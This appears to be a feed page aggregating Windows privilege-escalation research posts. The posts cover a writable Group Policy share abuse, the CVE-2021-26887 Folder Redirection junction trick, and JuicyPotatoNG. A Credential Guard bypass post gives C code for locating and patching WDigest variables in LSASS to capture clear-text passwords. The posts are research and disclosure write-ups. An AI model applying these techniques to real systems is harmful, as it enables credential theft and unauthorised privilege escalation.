Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows LPE

A not-so-common and stupid privilege escalation

By: Decoder
25 April 2022 at 15:26

Some time ago, I was doing a Group Policy assessment in order to check for possible misconfigurations. Apart running the well known tools, I usually take a look at the shared SYSVOL policy folder. The SYSVOL folder is accessible in read-only by all domain users & domain computers. My attention was caught at some point by the “Files.xml” files located under a specific user policy:

This policy settings were related to the “File Preference” Group policy settings running under the user configuration.

According to Microsoft this policy allows you to:

In this case, an exe file (CleanupTask.exe) was copied from a shared folder under a specific location under “Program Files” folder (the folder names are invented for confidentiality reasons). The “CleanupTask” executable was run by the Windows Task Scheduler every hour under the SYSTEM user.

The first question was, why not running under the computer configuration? Short answer: only some users had this “custom application” installed which needed to be replaced, so the policy was filtered for a particular users group, in our case “CustomApp” group and luckily my user “user1” was member of this group.

The policy was executed without impersonating the user (so under the SYSTEM context), otherwise I would have found and entry “userContext=1” in the xml file. This was necessary because a standard user cannot write in %ProgramFiles%

In addition the policy was run only once (FilterRunOnce), which would have prevented multiple copies each time the user logged in.

To sum it up this was the policy configuration from the DC perspective:

Now that I had a clear vision of this policy, I took a look at the shared hidden folder.. and guess what? It was writable for domain users, a real dangerous misconfig…

I think you already got it, I could place an evil executable (reverse shell, add my user to local admins and so on) in this directory, perform a gpupdate /force which would copy the evil program in “Program Files\CustomApp\Maintenance” and the wait for the CleanUptask to execute….

But I had still a problem, this policy was applied only once and in my case I was already too late.. so no way? Not at all. The evidence that the policy has already been executed is stored under a particular location in the Windows Registry under the “Current User” hive which we can modify…

All I needed to do was deleting the guid referring to the filter id of the group policy and then run gpudate /force again and perform all the nasty things…

Misconfigurations in Group Policies, especially those involving file operations can be very dangerous, so publish them after an extremely careful review 😉

Group Policy Folder Redirection CVE-2021-26887

By: Decoder
27 April 2022 at 17:30

Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with CVE-2021-26887 even if they did not really fix the issue (“folder redirection component interacts with the underlying NTFS file system has made this vulnerability particularly challenging to fix”). The proposed solution was reconfiguring Folder Redirection with Offline files and restricting permission.

I completely forgot about this case until the last few days when I came across my report and then decided to publish my findings (don’t expect nothing very sophisticated)

There is also an “important” update at the end.. so keep on reading 🙂

Summary

If “Folder Redirection” has been enabled via Group Policy and the redirected folders are hosted on a network share, it is possible for a standard user who has access on this file server to access other user’s folders and files (information disclosure) and eventually perform code execution and privilege escalation

Prerequisites

  1. A Domain User Group Policy with “Folder Redirection” has to be configured.
  2. A standard local or domain user has be able to login on the file server configures with the folder redirection shares (rdp, WinRm, ssh,…)
  3. There have to be domain users which will logon for the first time or will have the folder redirection policy applied for the first time

 

Steps to reproduce

In this example I used 3 VM’s:

  1. Windows 2019 Server acting as Domain Controller
  2. Windows 2019 Member Server acting as File Server
  3. Windows 10 domain joined client

On the domain controller I create a “Folder Redirection” Policy. In my example, I’m going to use the “Default Domain Policy” and redirect two folders, the user’s “Documents” and “AppData” Folder on a network share located on server “S01”.

The policy can be found in the SYSVOL share of the DC’s:

The folder redirected share is accessible via network path \\S01\users$. The permissions on this folder have been configured on server “S01” according to MS document: https://docs.microsoft.com/en-us/windows-server/storage/folder-redirection/deploy-folder-redirection

In my case “S01\Users” group is the group which will be applied the policy because this group contains the “Domain Users” groups too.

Each time domain user login to the domain the documents & appdata  folders (in this case) are saved on the network share. If it the first time the user logs in, the necessary directories are created under the share with strict permissions:

Someone could think to create the necessary directories before the domain users logs in, grant himself and the domain user full control and then access this private folder and data afterwards.

This is not possible, because during the first logon, if the folder already exists, a strict check on ownership and permissions are made and if they don’t match the folder will not be used. (I verified this with “procmon”)

But if the shared directory has valid permissions and owner, during the subsequent logins, no more checks on permissions are made and this could be a potential security issue.

How can I accomplish this? This is what I will do:

As a standard local/domain user login on the server where the shares are hosted (I know this is not so common..)

I will create a “junction” for the “a new” user who did not login to domain up to now or did not apply the Folder Redirection policy. (Finding “new” users is a real easy task for a standard domain user, so I won’t explain it). In my case, for example, “domainuser3”

Now I have to wait for domainuser3 to login from his Windows 10 (in my case) Documents…)

The Folder Redirection policy has been applied and permissions are set on the folders.

But as we can see on the fileserver S01, my junction point has been followed too, the real location of the folders is here:

Now, all the malicious user “localuser” has to do is wait for the domainuser3 logoff , delete the junction , create the new folders under the original share:

… and the set the permissions (Documents & AppData in our case) so that “everyone” will be granted full control:

Given that in my case the “AppData” folder is also redirected, we could place a “malicious” program in the user’s Startup folder which will then be executed at login (for example a reverse shell)

At this point, “localuser” has to wait for the next login of “domainuser3”

And will get a shell impersonating domainuser3 (imagine if it was a high privileged user):

Of course he will be able to access with full control permissions the documents folder:

Conclusions:

Even if the pre-conditions are not so “common”, this vulnerability could easily lead to information disclosure and EoP.

Update

So far the report, but when I read again the mitigations suggested by MS something was not so clear. The first time the user logs in, the necessary security checks are performed, so why did they say that it was not possible to fix? All they had to do was to perform these checks not only at the first logon, right?

My best guess is that if the profile, or more precisely the registry entry HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\<user_sid> is not found, checks are performed otherwise skipped.

A quick test demonstrated that I was right, after the first logon, I deleted the registry entry and security checks were again performed.

Maybe that the answer is in fdeploy.dll, for example in CEngine::_ProcessFRPolicy, I need to investigate further… or maybe I’m missing something, but this exercise is left to the reader.

That’s all 😉

Revisiting a Credential Guard Bypass

By: itm4n
23 May 2022 at 00:00

You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead.

Background

As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, there are two lsass.exe processes, the usual one and one running inside a Hyper-V Virtual Machine. Accessing the juicy stuff in this isolated lsass.exe process therefore means breaking the hypervisor, which is not an easy task.

Source: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-how-it-works

Though, in August 2020, an article was posted on Team Hydra’s blog with the following title: Bypassing Credential Guard. In this post, @N4k3dTurtl3 discussed a very clever and simple trick. In short, the too well-known WDigest module (wdigest.dll), which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their name is rather self explanatory, the first one holds the state of Credential Guard within the module (is it enabled or not?), the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard was not enabled and if the system was configured to keep clear-text passwords in memory. Once these two values have been properly patched within the LSASS process, the latter will keep a copy of the users’ password when the next authentication occurs. In other words, you won’t be able to access previously stored credentials but you will be able to extract clear-text passwords afterwards.

The implementation of this technique is rather simple. You first determine the offsets of the two global variables by loading wdigest.dll in a disassembler or a debugger along with the public symbols (the offsets may vary depending on the file version). After that, you just have to find the module’s base address to calculate their absolute address. Once their location is known, the values can be patched and/or restored in the target lsass.exe process.

The original PoC is available here. I found two other projects implementing it: WdToggle (a BOF module for Cobalt Strike) and EDRSandblast. All these implementations rely on hardcoded offsets, but is there a more elegant way? Is it possible to find them at run-time?

We need a plan

If we want to find the offsets of these two variables, we first have to understand how and where they are stored. So let’s fire up Ghidra, import the file C:\Windows\System32\wdigest.dll, load the public symbols and analyze the whole.

Loading the symbols allows us to quickly find these two values from the Symbol Tree. What we learn there is that g_IsCredGuardEnabled and g_fParameter_UseLogonCredential are two 4-byte values (i.e. double words / DWORD values) that are stored in the R/W .data section, nothing surprising about this.

If we take a look at what surrounds these two values, we can see that there is just a bunch of uninitialized data. And even once the module is loaded, there is most probably no particular marker that we will be able to leverage for identifying their location. It is like searching for a needle in a haystack, with the added challenge of not being able to distinguish the needle from the rest of the hay.

So, searching directly in the .data section is definitely not the way to go. There is a better approach, rather than searching for these values, we can search for cross references! The reason for these global variables to even exist in the first place is because they are used somewhere in the code. Therefore, if we can find these references, we can also find the variables.

Ghidra conveniently lists all the cross-references in the “Listing” view, so let’s see if there is anything interesting.

Two cross-references immediately stand out - SpAcceptCredentials and SpInitialize - as they are common to both variables. If we can limit the search to a single place, the whole process will certainly be a bit easier. On top of that, looking at these two functions in the symbol tree, we can see that SpInitialize is exported by the DLL, which means that we can easily get its address with a call to GetProcAddress() for instance.

We can go to the “Decompile” view and have a glimpse at how these variables are used within the SpInitialize function.

The RegQueryValueExW call is interesting because the x86 opcode of a function call is rather easy to identify. From there, we could then work backwards and see how the fifth argument is handled. This is a potential avenue to consider so let’s keep it in mind.

That would be a way to identify the g_fParameter_UseLogonCredential variable but what about g_IsCredGuardEnabled? The code from the “Decompile” view is not that easy to interpret as is, so we will have to go a bit deeper.

g_IsCredGuardEnabled = (uint)((*(byte *)(param_2 + 1) & 0x20) != 0);

Here, I found the assembly code to be less confusing.

mov r15,param_2
; ...
test byte ptr [r15 + 0x4],0x20
cmovnz eax,esi
mov dword ptr [g_IsCredGuardEnabled],eax

First, the second parameter of the function call - param_2 - is loaded into the R15 register. Then, it is incremented by 0x04, dereferenced and finally compared against the value 0x20.

The function Spinitialize is documented here. The documentation tells us that the second parameter is a pointer to a SECPKG_PARAMETERS structure.

NTSTATUS Spinitializefn(
  [in] ULONG_PTR PackageId,
  [in] PSECPKG_PARAMETERS Parameters,
  [in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable
)

The structure SECPKG_PARAMETERS is documented here. The attribute located at the offset 0x04 in the structure (c.f. byte ptr [R15 + 0x4]) is MachineState.

typedef struct _SECPKG_PARAMETERS {
  ULONG          Version;
  ULONG          MachineState;
  ULONG          SetupMode;
  PSID           DomainSid;
  UNICODE_STRING DomainName;
  UNICODE_STRING DnsDomainName;
  GUID           DomainGuid;
} SECPKG_PARAMETERS, *PSECPKG_PARAMETERS, SECPKG_EVENT_DOMAIN_CHANGE, *PSECPKG_EVENT_DOMAIN_CHANGE;

The documentation provides a list of possible flags for the MachineState attribute but it does not tell us what flag corresponds to the value 0x20. However it does tell us that the SECPKG_PARAMETERS structure is defined in the header file ntsecpkg.h. If so, we should find it in the Windows SDK, along with the SECPKG_STATE_* flags.

// Values for MachineState

#define SECPKG_STATE_ENCRYPTION_PERMITTED               0x01
#define SECPKG_STATE_STRONG_ENCRYPTION_PERMITTED        0x02
#define SECPKG_STATE_DOMAIN_CONTROLLER                  0x04
#define SECPKG_STATE_WORKSTATION                        0x08
#define SECPKG_STATE_STANDALONE                         0x10
#define SECPKG_STATE_CRED_ISOLATION_ENABLED             0x20
#define SECPKG_STATE_RESERVED_1                   0x80000000

Here we go! The value 0x20 corresponds to the flag SECPKG_STATE_CRED_ISOLATION_ENABLED, which makes quite a lot of sense in our case. In the end, the previous line of C code could simply be rewritten as follows.

g_IsCredGuardEnabled = (param_2->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;

Note: I could have also helped Ghidra a bit by defining this structure and editing the prototype of the SpInitialize function to achieve a similar result.

That’s all very well, but do we have clear opcode patterns to search for? The answer is “not really”… Prior to the RegQueryValueExW call, a reference to g_fParameter_UseLogonCredential is loaded in RAX, that’s a rather common operation and we cannot rely on the fact that the compiler will use the same register every time. After the call to RegQueryValueExW, g_fParameter_UseLogonCredential is set to 0 in an if statement. Again this is a generic operation so it is not good enough for establishing a pattern. As for g_IsCredGuardEnabled, there is an interesting set of instructions but we cannot rely on the fact that the compiler will produce the same code every time here either.

; Before the call to RegQueryValueExW
; 180003180 48 8d 05 2d 30 03 00
lea     rax,[g_fParameter_UseLogonCredential]
; ...
; 18000318e 48 89 44 24 20
mov     qword ptr [rsp + local_b8],rax=>g_fParameter_UseLogonCredential
; After the call to RegQueryValueExW
; 1800031b1 44 89 25 fc 2f 03 00
mov     dword ptr [g_fParameter_UseLogonCredential],r12d
; Test on param_2->MachineState
; 18000299b 41 f6 47 04 20
test    byte ptr [r15 + 0x4],0x20
; 1800029a0 0f 45 c6
cmovnz  eax,esi
; 1800029a3 89 05 5f 32 03 00
mov     dword ptr [g_IsCredGuardEnabled],eax

We are (almost) back to square one. However, we had a second option - SpAcceptCredentials - so let’s try our luck with this function. As it turns out, the two variables seem to be used in a single if statement as we can see in the “Decompile” view.

The original assembly consists of a CMP instruction, followed by a MOV instruction.

; 180001839 39 1d 75 49 03 00
cmp     dword ptr [g_fParameter_UseLogonCredential],ebx
; 18000183f 8b 05 c3 43 03 00
mov     eax,dword ptr [g_IsCredGuardEnabled]
; 180001845 0f 85 9c 77 00 00
jnz     LAB_180008fe7

Since the public symbols were imported and the PE file was analyzed, Ghidra conveniently displays the references to the variables rather than addresses or offsets. To better understand how this works though, we should have a look at the “raw” assembly code.

cmp    dword ptr [rip + 0x34975],ebx  ; 39 1d 75 49 03 00
mov    eax,dword ptr [rip + 0x343c3]  ; 8b 05 c3 43 03 00
jnz    0x77ae                         ; 0f 85 9c 77 00 00

On the first line, the first byte - 39 - is the opcode of the CMP instruction to compare a 16 or 32 bit register against a 16 or 32 bit value in another register or a memory location. Then, 1d represents the source register (EBX in this case). Finally, 75 49 03 00 is the little endian representation of the offset of g_fParameter_UseLogonCredential relative to RIP (rip+0x34975). The second line works pretty much the same way although it is a MOV instruction.

The third line represents a conditional jump, which won’t help us establish a reliable pattern. If we consider only the first two lines though, we can already build a potential pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. We just make the reasonable assumption that the offsets won’t exceed the value 0x00ffffff.

No need to say that this is not great but there is still room for improvement so let’s test it first and see if it is at least good enough as a starting point. For that matter, Ghidra has a convenient “Search Memory” tool that can be used to search for byte patterns.

To my surprise, this simple pattern yielded only one result in the entire file. Of course, it is not completely relevant because the PE file also has uninitialized data that could contain this pattern once it is loaded. Though, to address this issue, we can very well limit the search to the .text section because it is not subject to modifications at run-time.

There is still one last problem. I tested the pattern against a single file. What if this pattern is not generic enough or what if it yields false positives in other versions of wdigest.dll? If only there was an easy way to get my hands on multiple versions of the file to verify that…

And here comes the The Windows Binaries Index (or “Winbindex”). This is a nicely designed web application that aggregates all the metadata from update packages released by Microsoft. It also provides a link whenever the file is available for download. Kudos to @m417z for this tool, this is a game changer. From the home page, I can simply search for wdigest.dll and virtually get access to any version of the file.

Apart from the version installed in my VM (10.0.19041.388), I tested the above pattern against the oldest (10.0.10240.18638 - Windows 10 1507) and the most recent version I could find (10.0.22000.434 - Windows 11 21H2) and it worked amazingly well in both cases.

It looks like a plan is starting to emerge. In the end, the overall idea is pretty simple. We have to read the DLL, locate the .text section and simply search for our pattern in the raw data. From the matching buffer, we will then be able to extract the variable offsets and adjust them (more on that later).

Practical implementation

Let me quickly recap what we are trying to achieve. We want to read and patch two global variables within the wdigest.dll module. Because of their nature, these two variables are located in the R/W .data section, but they are not easy to locate as they are just simple boolean flags. However, we identified some code in the .text section that references them. So, the idea is to first extract their offsets from the assembly code, and then get the base address of the target module to find their exact location in the lsass.exe process.

Searching for our code pattern

We want to find a portion of the code that matches the pattern 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. To do so, we have to first locate the .text section of the wdigest.dll PE file. There are two ways to do this. We can either load the module in the memory of our process or read the file from disk. I decided to go for the second option (for no particular reason).

Locating the .text section is easy. The first bytes of the PE file contain the DOS header, which gives us the offset to the NT headers (e_lfanew). In the NT headers, we find the FileHeader member, which gives us the number of sections (NumberOfSections).

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    // ...
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    // ...
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

We can then simply iterate the section headers that are located after the NT headers, until with find the one with the name .text.

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    // ...
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    // ...
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

Once we have identified the section header corresponding to the .text section, we know its size and offset in the file. With that knowledge, we can invoke SetFilePointer to move our pointer of PointerToRawData bytes from the beginning of the file and read SizeOfRawData bytes into a pre-allocated buffer.

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", ...);
PBYTE pTextSection = (PBYTE)LocalAlloc(LPTR, SectionHeader.SizeOfRawData);
SetFilePointer(hFile, SectionHeader.PointerToRawData, NULL, FILE_BEGIN);
ReadFile(hFile, pTextSection, SectionHeader.SizeOfRawData, NULL, NULL);

Then, it is just a matter of reading the buffer, which I did with a simple loop. When I find the byte 0x39, which is the first byte of the pattern, I simply check the following 11 bytes to see if they also match.

// Pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00
j = 0;
while (j < sh.SizeOfRawData) {
  if (pTextSection[j] == 0x39) {
    if ((pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {
          wprintf(L"Match at offset: 0x%04x\r\n", SectionHeader.VirtualAddress + j);
    }
  }
}

However, I do not stop at the first occurrence. As a simple safeguard, I check the entire section and count the number of times the pattern is matched. If this count is 0, obviously this means that the search failed. But if the count is greater than 1, I also consider that it failed. I want to make sure that the pattern matches only once.

Just for testing purposes and out of curiosity, I also tried several variants of the pattern to sort of see how efficient it was. Surprisingly, the count dropped very quickly with only two occurrences for the variant #2.

Variant Pattern Occurrences
1 39 .. .. .. .. 00 .. .. .. .. .. .. 98
2 39 .. .. .. .. 00 8b .. .. .. .. .. 2
3 39 .. .. .. .. 00 8b .. .. .. .. 00 1

If we execute the program, here is what we get so far. We have exactly one match at the offset 0x1839.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

For good measure, we can verify if the offset 0x1839 is correct by going back to Ghidra. And indeed, the code we are interested in starts at 0x180001839.

Note: the value 0x180000000 is the default base address of the PE. This value can be found in NtHeaders.OptionalHeader.ImageBase.

Extracting the variable offsets

Below are the bytes that we were able to extract from the .text section, and their equivalent x86_64 disassembly.

cmp    dword ptr [rip + 0x34975], ebx   ; 39 1D   75 49 03 00
mov    eax, dword ptr [rip + 0x343c3]   ; 8B 05   C3 43 03 00

And here is the thing I intentionally glossed over in the first part. Since I am no used to reading assembly code, these two lines initially puzzled me. I was expecting to find the addresses of the two variables directly in the code, but instead, I found only RIP-relative offsets.

I learned that the x86_64 architecture indeed uses RIP-relative addressing to reference data. As explained in this post, the main advantage of using this kind of addressing is that it produces Position Independent Code (PIC).

The RIP-relative address of g_fParameter_UseLogonCredential is rip+0x34975. We found the code at the address 0x00001839, so the absolute offset of g_fParameter_UseLogonCredential should be 0x00001839 + 0x34975 = 0x361ae, right?

But the offset is actually 0x361b4. Oh, wait… When an instruction is executed, RIP actually already points to the next one. This means that we must add 6, the length of the CMP instruction, to this value: 0x00001839 + 6 + 0x34975 = 0x361b4. Here we go!

We apply the same method to the second variable - g_IsCredGuardEnabled - and we find: 0x00001839 + 6 + 6 + 0x343c3 = 0x35c08.

We identified the 12 bytes of code and we know their offset in the PE, so the implementation is pretty easy. The RIP-relative offsets are stored using the little endian representation, so we can directly copy the four bytes into DWORD temporary variables if we want to interpret them as unsigned long values.

DWORD dwUseLogonCredentialOffset, dwIsCredGuardEnabledOffset;

RtlMoveMemory(&dwUseLogonCredentialOffset, &Code[2], sizeof(dwUseLogonCredentialOffset));
RtlMoveMemory(&dwIsCredGuardEnabledOffset, &Code[8], sizeof(dwIsCredGuardEnabledOffset));
dwUseLogonCredentialOffset += 6 + dwCodeOffset;
dwIsCredGuardEnabledOffset += 6 + 6 + dwCodeOffset;

wprintf(L"Offset of g_fParameter_UseLogonCredential: 0x%08x\r\n", dwUseLogonCredentialOffset);
wprintf(L"Offset of g_IsCredGuardEnabled: 0x%08x\r\n", dwIsCredGuardEnabledOffset);

And here is the result.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08

Finding the base address

Now that we know the absolute offsets of the two global variables, we must determine their absolute address in the target process lsass.exe. Of course, this part was already implemented in the original PoC, using the following method:

  1. Open the lsass.exe process with PROCESS_ALL_ACCESS.
  2. List the loaded modules with EnumProcessModules.
  3. For each module, call GetModuleFileNameExA to determine whether it is wdigest.dll.
  4. If so, call GetModuleInformation to get its base address.

Ideally, we would like to interact as less as possible with LSASS, but as we need to patch it anyway, this method works perfectly fine. I just wanted to take this opportunity to present another approach and discuss some aspects of Windows DLLs.

The key thing is that the base address of a module is determined when it is first loaded. Therefore, any subsequent process loading this module will use the exact same base address. In our case, this means that if we load wdigest.dll in our current process, we will be able to determine its base address without even having to touch LSASS. (I will admit that this sounds a bit dumb because the whole purpose is to eventually patch it.)

Loading a DLL is commonly done through the Windows API LoadLibraryW or LoadLibraryExW. The documentation states that they return “a handle to the module”, but I would say that it is a bit misleading. These functions actually return a HMODULE, which is not a typical kernel object HANDLE. In reality, the HMODULE value is… the base address of the module.

In conclusion, we can get the base address of wdigest.dll in the lsass.exe process simply by running the following code in our own context. One could argue that loading wdigest.dll might look suspicious, but it is nothing compared to patching LSASS anyway so this is not really my concern here.

HMODULE hModule;
if ((hModule = LoadLibraryW(L"wdigest.dll")))
{
  wprintf(L"Base address of wdigest.dll: 0x%016p\r\n", hModule);
  FreeLibrary(hModule);
}

After adding this to my own PoC and calculating the addresses, here is what I get. Not bad!

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08
Base address of wdigest.dll: 0x00007FFEE32B0000
Address of g_fParameter_UseLogonCredential: 0x00007ffee32e61b4
Address of g_IsCredGuardEnabled: 0x00007ffee32e5c08

We can confirm that the base address of wdigest.dll is the same by inspecting the memory of the lsass.exe process using Process Hacker for instance.

Conclusion

The first thing I want to say is thank you to @N4k3dTurtl3 for the initial post on this subject. I really liked the simplicity and efficiency of this trick. It always amazes me how this kind of hack can defeat really advanced protections such as Credential Guard.

Now, the question is, as a pentester (or a red teamer), should you use the technique I described in this post? The idea of not having to rely on hardcoded offsets and therefore running code that is version-independent is attractive. However, it might also be a bit riskier as pattern matching is not an exact science. To address this, I implemented a safeguard which consists in ensuring that the pattern is matched exactly once. This leaves us with only one potential false positive: the pattern could be matched exactly once on a random portion of code, which seems rather unlikely. The only risk I see is that Microsoft could slightly change the implementation so that my pattern just no longer works.

As for defenders, enabling Credential Guard should not refrain you from enabling LSA protection as well. We all know that it can be completely bypassed, but this operation has a cost for an attacker. It requires to run code in the Kernel or use a sophisticated userland bypass, which both create avenues for detection. As rightly said by @N4k3dTurtl3:

The goal is to increase the cost in time, effort, and tooling […] thus making your network less appealing as a target and increasing opportunities for detection and response.

Lastly, this was a cool little challenge, not too difficult, and as always I learned a few things along the way, the perfect recipe. Oh, and if you have read this far, you can find my PoC here.

Links & Resources

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

By: itm4n
20 February 2021 at 23:00
A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share. In the Previous Episode… Before we begin, here is a brief s...

Do You Really Know About LSA Protection (RunAsPPL)?

By: itm4n
6 April 2021 at 22:00
When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days. Introdu...

Fuzzing Windows RPC with RpcView

By: itm4n
31 July 2021 at 22:00
The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area. RPC as a Fuzzing Target? As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX sy...

From RpcView to PetitPotam

By: itm4n
1 September 2021 at 22:00
In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool. The Theory Before diving into the main subject, I need to discuss so...

Revisiting a Credential Guard Bypass

By: itm4n
22 May 2022 at 22:00
You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead. Background As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, t...

Bypassing LSA Protection in Userland

By: itm4n
21 April 2021 at 22:00
In 2018, James Forshaw published an article in which he briefly mentioned a trick that could be used to inject arbitrary code into a PPL as an administrator. However, I feel like this post did not get the attention it deserved as it literally described a potential Userland exploit for bypassing PPL (which includes LSA Protection). Introduction I was doing some research on Protected Processes ...

The End of PPLdump

By: itm4n
23 July 2022 at 22:00
A few days ago, an issue was opened for PPLdump on GitHub, stating that it no longer worked on Windows 10 21H2 Build 19044.1826. I was skeptical at first so I fired up a new VM and started investigating. Here is what I found… PPLdump in a nutshell If you are reading this, I would assume that you already know what PPLdump is and what it does. But just in case you do not, here is a very brief s...

Giving JuicyPotato a second chance: JuicyPotatoNG

By: Decoder
21 September 2022 at 17:07

Well, it’s been a long time ago since our beloved JuicyPotato has been published. Meantime things changed and got fixed (backported also to Win10 1803/Server2016) leading to the glorious end of this tool which permitted to elevate to SYSTEM user by abusing impersonation privileges on Windows systems.

With Juicy2 it was somehow possible to circumvent the protections MS decided to implement in order to stop this evil abuse but there were some constraints, for example requiring an external non Windows machine redirecting the OXID resolution requests.

The subset of CLSID’s to abuse was very restricted (most of them would give us an Identification token), in fact it worked only on Windows10/11 versions with the “ActiveX Installer Service”. The “PrintNotify” service was also a good candidate (enabled also on Windows Server versions) but needed to belong to the “INTERACTIVE” group which in fact limited the abuse of service accounts.

When James Forshaw published the post about relaying Kerberos DCOM authentication which is also an evolution of our “RemotePotato0” we reconsidered the limitation given that he demonstrated that it was possible to do everything on the same local machine.

The “INTERACTIVE” constraint could also be easily bypassed as demonstrated by @splinter_code’s magic RunasCs tool.

Putting all the pieces together was not that easy and I have to admit I’m really lazy in coding, so I asked my friend (and coauthor in the *potato saga) @splinter_code for help. He obviously accepted the engagement 🙂

How we implemented it

The first thing we implemented was Forshaw’s “trick” for resolving Oxid requests to a local COM server on a randomly selected port.
We spoofed the image filename of our running process to “System” for bypassing the windows firewall restriction (if enabled) and decided to use port 10247 as the default port given that in our tests this port was generally available locally to a low privileged user.

When we want to activate a COM object we need to take into consideration the security permissions configured. In our case the PrintNotify service had the following Launch and Activation permission:

Given that the INTERACTIVE group was needed for activating the PrintNotify object (identified by the CLSID parameter), we used the following “trick”:

When using LogonUser() API call with Logon Type 9 (NewCredentials), LSASS will build a copy of our token and will add the INTERACTIVE sid along with others, e.g. the new logon session created sid. Due to the fact we created this token through LogonUser() and explicit credentials we don’t need impersonation privileges to impersonate it. Of course, the credentials are fake, but that doesn’t matter as they will be used only over the network while the original caller identity will be used locally.

Last but not least, we needed to capture the authentication in order to impersonate the SYSTEM user. The most obvious solution was to write our own RPC server listening on port 10247 and then simply call RpcImpersonateClient().
However, this was not possible. That’s because when we register our RPC server binding information through RpcServerUseProtseqEp(), the RPC runtime will bind to the specified port and this port will be “busy” for others that try using it.
We could have implemented some hack to enumerate the socket handles in our process and hijack the socket, but that was an unnecessary heavy load of code.

So we decided to implement an SSPI hook on AcceptSecurityContext() function which would allow us to intercept the authentication and get the SYSTEM token to impersonate:

Using this approach through an SSPI hook instead of relying on RpcImpersonateClient() has the double advantage to make this exploit work even when holding only SeAssignPrimaryTokenPrivilege. As you may know the RpcImpersonateClient() requires your process to hold the SeImpersonatePrivilege, so that would have added an unnecessary limitation.

The JuicyPotatoNG TOOL

The source code of JuicyPotatoNG written in Visual Studio 2019 c++ can be downloaded here.

The Port problem

As mentioned, we choose the default COM server port “10247” but sometimes you can run into a situation where the port is not available. The following simple powershell script will help you to find the available ports, just choose the one not already in use and you’re done.

Countermeasures

Be aware, this is not considered by MS a “Security Boundary” violation. Abusing impersonation privileges is an expected behavior 😉

So what can we do in order to protect ourselves?

First of all, service accounts and accounts with these privileges should be protected by strong passwords and strict access policies, and in case of service accounts “Virtual service accounts” or “Group Managed Service Accounts” should be used. You could also consider removing unnecessary privileges as described in of of my posts but this is not totally secure too…

In this particular case, just disabling the “ActiveX Installer Service” and the “Print Notify Service” will inhibit our exploit (and has no serious impact). But remember there could be “third parties” CLSID’s with SYSTEM impersonation too..

Conclusions

This post is the demonstration that you should never give up and always push the limits one step further 🙂 … and we have other *potato ready, so stay tuned!

Special thanks to the original “RottenPotato” developers, Giuseppe Trotta, and as usual to James Forshaw

That’s all 😉

Update

It seems that Microsoft “fixed” the INTERACTIVE trick and JuicyPotatoNG stopped working. But guess what, there is another CLSID which does not require the INTERACTIVE group and impersonates SYSTEM: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}

Runs only on win11/2022…

Authors of this post: @decoder_it, @splinter_code

Debugging Protected Processes

By: itm4n
3 December 2022 at 23:00
